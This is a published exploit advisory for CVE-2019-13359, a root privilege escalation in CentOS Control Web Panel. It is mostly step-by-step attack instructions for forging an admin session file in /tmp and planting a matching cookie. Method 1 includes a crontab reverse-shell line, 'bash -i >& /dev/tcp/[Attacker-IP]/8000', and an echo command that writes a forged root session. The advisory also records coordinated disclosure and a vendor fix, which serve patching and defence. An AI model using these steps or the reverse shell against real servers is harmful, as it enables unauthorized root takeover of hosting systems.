|| ||
|| CWP Control Web Panel - ||
|| Root Privilege Escalation ||
|| ||
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# Information
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# Exploit Title: CWP (CentOS Control Web Panel) < Root Privilege Escalation
# Date: 6 July 2019
# Exploit Author: Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
# Vendor Homepage: https://control-webpanel.com/changelog
# Software Link: http://centos-webpanel.com/cwp-el7-latest (Have to change
version in the script)
# Version: to
# Tested on: CentOS 7.6.1810 (Core)
# CVE : CVE-2019-13359
Product : CWP Control Web Panel
Vulnerability Name: Root Privilege Escalation
version :
Fixed on:
Test on : Tested on: CentOS 7.6.1810 (Core)
Reference : http://centos-webpanel.com/
: https://control-webpanel.com/changelog
CVE-Number: CVE-2019-13359
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# Root course of the vulnerability
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1. The session file are store at /tmp directory
2. rkey value in the session file dose not change when access by the same source IP address
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# Steps to Reproduce
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Session prepareation state
1. Check the current IP address of attacker
2. Set the IP address on testing environment network
3. Login as root on port 2031/2087 and save the cookie name from web browser (cwsrp-xxxxxxxxxxxxxxxxxxxxx)
4. Copy the content of session file (/tmp/sess_xxxxxxxxxxxxxx) to a new file "sess_123456"# we need "rkey"
5. Save the token value from the session file (cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx)
* rkey is created from client ip, then do not change client ip when attack the real target
Attack state
# Method 1 Uploading via reverse shell
1. Go to crontab and set "bash -i >& /dev/tcp/[Attacker-IP]/8000 0>&1"
2. Create session file through reverse shell
echo "username|s:4:\"root\";logged|b:1;rkey|s:20:\"[RKEY]\";token|s:36:\"[TOKEN-KEY]\";" > /tmp/sess_123456
3. On another browser, replace the token value in the URL https://[target.com]:2031/cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/admin/index.php
4. Change file permission "chmod 664 /tmp/sess_123456"
5. Create cookie name "cwsrp-xxxxxxxxxxxxxxxxxxxxx" and set its value to "123456" (sess_123456)
6. Open the URL and become the root user
# Method 2 Uploading via File manager function
1. On the real target, login as a normal user on port 2083 and upload file "sess_123456" to /tmp directory and set permission to 644 (chmod 664 /tmp/sess_123456) via crontab feature
2. On another browser, replace the token value in the URL https://[target.com]:2031/cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/admin/index.php
3. Create cookie name "cwsrp-xxxxxxxxxxxxxxxxxxxxx" and set its value to "123456" (sess_123456)
4. Open the URL and become the root user
*From step 1 - 4 need doing it quickly. if we do it too slow, the application will change the permission of file sess_123456 to 600, and the file will become 0 byte. If this happened, attacker need to change session file name and repeat the steps again
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# PoC
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# Timeline
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2019-06-30: Discovered the bug
2019-06-30: Reported to vendor
2019-06-30: Vender accepted the vulnerability
2019-07-02: The vulnerability has been fixed
2019-07-06: Published
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# Discovered by
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Pongtorn Angsuchotmetee
Nissana Sirijirakal
Narin Boonwasanarak